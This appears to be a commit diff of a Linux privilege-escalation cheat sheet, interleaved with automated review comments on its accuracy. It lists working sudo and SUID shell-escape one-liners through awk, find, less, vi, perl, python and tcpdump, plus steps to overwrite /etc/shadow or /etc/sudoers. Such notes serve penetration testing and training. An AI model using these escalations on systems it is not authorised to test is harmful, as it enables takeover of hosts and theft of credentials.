Commit e0a71f4a authored by bobloblaw's avatar bobloblaw

Updates privilege_escalation_-_linux.md

Auto commit by GitBook Editor
parent eb4724a5
+112 −126
@@ -134,6 +134,7 @@ pkg_info

### Weak/reused/plaintext passwords


- Check database config-file (`config.php` or similar)
- Check databases
- Check weak passwords
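Review bot: the only change in this hunk is a second blank line after the `### Weak/reused/plaintext passwords` heading, which renders identically to a single one and just adds whitespace noise; drop it, or use the hunk to make the three bullets actionable, since `Check databases` and `Check weak passwords` say nothing about what to do: name the web-application config files to look for beyond `config.php`, state that a password recovered there should be tried against the local user accounts and the database admin account, and say what "weak" means here (default or username-equals-password credentials).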
@@ -165,122 +166,122 @@ netstat -anlp
netstat -ano
```

### Suid Misconfiguration
### Suid and Guid Misconfiguration

A binary with suid permission can be run by anyone, but when they are run they are run as the user who set the suid. It could be root, or another user. If the suid-bit is set on a program that can spawn a shell or in another way abuse the rights.

For example, these are some programs that can be used to spawn a shell:

## Communication
```
nmap
vim
less
more
```

### Mail
If these programs have suid-bit set we can use them to escalate privileges too. For more of these and how to use the see the next section about abusing sudo-rights:

```
/var/spool/mail
nano
cp
mv
find
```

## Logs
**Find suid and guid files**

## References

[http://www.rebootuser.com/?p=1758](http://www.rebootuser.com/?p=1758)
```
#Find SUID
find / -perm -u=s -type f 2>/dev/null

[http://netsec.ws/?p=309](http://netsec.ws/?p=309)
#Find GUID
find / -perm -g=s -type f 2>/dev/null
```

# Privilege Escalation - Linux
### Abusing sudo-rights

### Weak or reused passwords
If you have a limited shell that access to some sudo programs you might be able to escalate your privileges with it. Any program that can write or overwrite can be used. If you have `cp` you can overwrite `/etc/shadow` or `/etc/sudoers`.

If there is a web-server, check the connection to the database. Try that password. Also log into the database with the user you found. Is there a admin-account that might be reusing passwords?

Config-files  
postfix  
newsbeauter
`awk`

### Configuration mistakes
```
awk 'BEGIN {system("/bin/bash")}'
```

`bash`

#### Bad path configuration
`cp`  
Copy and overwrite /etc/shadow
   
Putting . in the path  
If you put a dot in your path you won't have to write `./binary to be able to execute it. You will be able to execute any script or binary that is in the current directory.`
`find`

Why do people/sysadmins do this? Because they are lazy and won't want to write `./.`
```bash
sudo find / -exec bash -i \;

This explains it  
[https://hackmag.com/security/reach-the-root/](https://hackmag.com/security/reach-the-root/)  
And here  
[http://www.dankalia.com/tutor/01005/0100501004.htm](http://www.dankalia.com/tutor/01005/0100501004.htm)
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;
```
   
#### **Cronjob**
`ht`  
The text/binary-editor HT.

With privileges running script that are editable for other users.
`less`
From less you can go into vi, and then into a shell

#### World writable scripts invoked as root
```
sudo less /etc/shadow
v
:shell
```

World/user writable scripts that are invoked by root can me rewritten to escalate privileges.
`more`  

Also check scripts that are called by these scripts.
You need to run more on a file that is bigger than your screen.

```
#World writable files directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o w -type d 2>/dev/null

# World executable folder
find / -perm -o x -type d 2>/dev/null

# World writable and executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null
sudo more /home/pelle/myfile
!/bin/bash
```

#### World/user writable binaries
`mv`
Overwrite `/etc/shadow` or `/etc/sudoers`

#### Weak permissions on LD\_preload
`man`

[https://blog.maleadt.net/2015/02/25/sudo-escalation/](https://blog.maleadt.net/2015/02/25/sudo-escalation/)
`nano`

#### Homemade crappy suid programs
`nc`

**SUID files**
`nmap`

SUID is a bit that you can set on a file. If you run a binary the binary is run as the user who is running it. But if the binary has the SUID-bit it will be run as the owner of that binary. This can be abused.

Here is how you find SUID files:
`python/perl/ruby/lua/etc`

```
find / -perm -u=s -type f 2>/dev/null
sudo perl
exec "/bin/bash";
ctr-d
```

Run ltrace on them to see what they do.

#### Setuid/setuig

SUID is a bit that you can set on a file. If you run a binary the binary is run as the user who is running it. But if the binary has the SUID-bit it will be run as the owner of that binary. This can be abused.  
Any editor with a setudi/setuig can be abused.
```
sudo python
import os
os.system("/bin/bash")
```

**nmap**  
SUID on nmap.
`sh`

Find them
`tcpdump`

```
#Find SUID
find / -perm -u=s -type f 2>/dev/null

#Find GUID
find / -perm -g=s -type f 2>/dev/null
echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
```

### Abusing sudo-rights

If you have a shell that has limited sudo programs you might still be able to use it. Any program that can write or overwrite can be used. If you have `cp you can overwrite /etc/shadow or /etc/sudoers.   
`**`ht`**`  
The text/binary-editor HT running as sudo`

**nano**
`vi/vim`

**vi/vim**  
With vi it is even easier. Just open vi
Can be abused like this:

```
sudo vi
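Review bot: the new SUID explanation gets the core mechanism wrong: `run as the user who set the suid` is not how setuid works; the binary runs with the effective uid of the file's owner, which the older wording further down in this same hunk (`run as the owner of that binary`) had right, and the next sentence `If the suid-bit is set on a program that can spawn a shell or in another way abuse the rights.` has no main clause. `Guid`/`GUID` in the heading and the `#Find GUID` comment should read SGID (setgid); GUID is an unrelated term. In the sudo examples: `find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;` is missing `sudo` and the trailing `;` must be escaped as `\;`, otherwise the shell consumes it and find aborts for lack of an `-exec` terminator; `sudo find / -exec bash -i \;` spawns one interactive shell per file found and should end with `-quit`; `ctr-d` should read `ctrl-d` (or use `sudo perl -e 'exec "/bin/bash"'` and skip the interactive session); the `less` example does not need the detour via `v` and `:shell`, which only works when the editor less launches is vi, because `!/bin/bash` works from the less prompt exactly as the `more` example shows; and the tcpdump postrotate script written to `/tmp/.test` has no shebang line. Formatting: the backtick spans in `If you have \`cp you can overwrite /etc/shadow` and in `\`**\`ht\`**\`` are unbalanced and will render as garbled inline code.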
@@ -288,90 +289,75 @@ sudo vi

:set shell=/bin/bash:shell    
:!bash
```
``

And you have shell.
[How I got root with sudo/](https://www.securusglobal.com/community/2014/03/17/how-i-got-root-with-sudo/)

**less**  
From less you can go into vi, and then into a shell

```
sudo less /etc/shadow
v
:shell
```
## Communication

**more**  
You need to run more on a file that is bigger than your screen.
### Mail

```
sudo more /home/pelle/myfile
!/bin/bash
/var/spool/mail
```

**cp**  
Copy and overwrite /etc/shadow
## Logs

**mv**  
Overwrite /etc/shadow or /etc/sudoers
## References

**find**
[http://www.rebootuser.com/?p=1758](http://www.rebootuser.com/?p=1758)

```
sudo find / -exec bash -i \;
[http://netsec.ws/?p=309](http://netsec.ws/?p=309)

find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;
```
# Privilege Escalation - Linux

**python/perl/ruby/lua/etc**

```
sudo perl
exec "/bin/bash";
ctr-d
```
### Configuration mistakes

```
sudo python
import os
os.system("/bin/bash")
```

**nmap**
#### Bad path configuration

**awk**
Putting . in the path  
If you put a dot in your path you won't have to write `./binary to be able to execute it. You will be able to execute any script or binary that is in the current directory.`

```
awk 'BEGIN {system("/bin/bash")}'
```
Why do people/sysadmins do this? Because they are lazy and won't want to write `./.`

**bash**
This explains it  
[https://hackmag.com/security/reach-the-root/](https://hackmag.com/security/reach-the-root/)  
And here  
[http://www.dankalia.com/tutor/01005/0100501004.htm](http://www.dankalia.com/tutor/01005/0100501004.htm)

**sh**
#### **Cronjob**

**man**
With privileges running script that are editable for other users.

#### World writable scripts invoked as root

World/user writable scripts that are invoked by root can me rewritten to escalate privileges.

**nc**
Also check scripts that are called by these scripts.

**netcat**
```
#World writable files directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o w -type d 2>/dev/null

**ruby**
# World executable folder
find / -perm -o x -type d 2>/dev/null

**lua**
# World writable and executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null
```

**irb**
#### World/user writable binaries

**tcpdump**
#### Weak permissions on LD\_preload

[https://www.securusglobal.com/community/2014/03/17/how-i-got-root-with-sudo/](https://www.securusglobal.com/community/2014/03/17/how-i-got-root-with-sudo/)
[https://blog.maleadt.net/2015/02/25/sudo-escalation/](https://blog.maleadt.net/2015/02/25/sudo-escalation/)

```
echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
```

**emacs**

### Software vulnerabilites
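Review bot: the symbolic `-perm` forms in the world-writable block are malformed: `find / -perm -o w -type d`, `find / -perm -o x -type d` and `\( -perm -o w -perm -o x \)` hand `-o` to find as the mode string, which is not a valid symbolic mode; write `-perm -o=w` and `-perm -o=x`. The comment `#World writable files directories` promises files, but every command is restricted to `-type d`, while the `#### World/user writable binaries` heading below has no command at all; move a `-type f` variant there. `Weak permissions on LD\_preload` should read `LD_PRELOAD` (the variable is uppercase and the backslash is a stray escape) and that section currently contains only a link with no explanation of when sudo lets the variable through. Smaller fixes in this hunk: `can me rewritten` should be `can be rewritten`, `Software vulnerabilites` should be `vulnerabilities`, the orphan ``` `` ``` line after the vi block and the dangling `./.` after `won't want to write` are leftover markup, the run-together `:set shell=/bin/bash:shell` should be two vi commands (`:set shell=/bin/bash` then `:shell`) or simply the `:!bash` already shown on the next line, and the `If you put a dot in your path you won't have to write \`./binary ...` sentence has an unclosed backtick that swallows the rest of the paragraph.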